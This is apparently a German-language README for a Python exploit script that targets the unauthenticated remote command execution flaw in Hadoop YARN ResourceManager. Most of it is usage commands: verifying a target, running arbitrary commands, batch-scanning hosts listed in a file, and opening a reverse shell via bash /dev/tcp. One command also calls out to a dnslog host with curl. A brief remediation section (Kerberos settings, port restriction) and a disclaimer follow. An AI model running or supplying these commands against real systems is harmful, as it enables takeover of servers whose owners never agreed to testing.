
Hadoop Yan ResourceManager unauthorized RCE
Im Hadoop yarn ResourceManager gab es eine Schwachstelle für unbefugten Zugriff. Diese Schwachstelle bestand in Hadoop yarn, der Kernkomponente von Hadoop. Da Hadoop yarn den RPC-Dienst standardmäßig öffentlich zugänglich machte, konnte ein entfernter Angreifer diese Schwachstelle für unbefugten Zugriff ausnutzen und über den RPC-Dienst beliebige Befehle ausführen, um den Zielserver zu kontrollieren. Angesichts des hohen Risikostatus und des großen Schadens dieser Schwachstelle sowie der Tatsache, dass die Details bereits offengelegt und ausgenutzt wurden, wird allen Benutzern von Apache Hadoop empfohlen, eine Selbstprüfung durchzuführen und rechtzeitig Sicherheitsmaßnahmen zu ergreifen.
Apache Hadoop Yarn *
python3 Hadoop_Yan_RPC_RCE.py

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "curl xxx.dnslog.cn"


python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

https://nosec.org/home/detail/4905.html
https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth
1.Aktivieren Sie die Kerberos-Authentifizierung, um unbefugten Zugriff zu verhindern.
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
<final>false</final>
<source>core-site.xml</source>
</property>...
<property>
<name>hadoop.rpc.protection</name>
<value>authentication</value>
<final>false</final>
<source>core-default.xml</source>
</property>
2.Verhindern Sie, dass externe Adressen auf die zugehörigen Ports des Hadoop-RPC-Dienstes zugreifen, oder konfigurieren Sie diese so, dass sie nur für vertrauenswürdige Adressen geöffnet sind.
Feierliche Erklärung: Verwenden Sie dieses Tool nicht für illegale Aktivitäten. Dieses Tool dient ausschließlich der Sicherheits-Selbstprüfung durch das Personal der Partei A und das Personal der Partei B. Wenn der Benutzer es illegal verwendet, trägt der Benutzer die rechtliche Verantwortung!!!.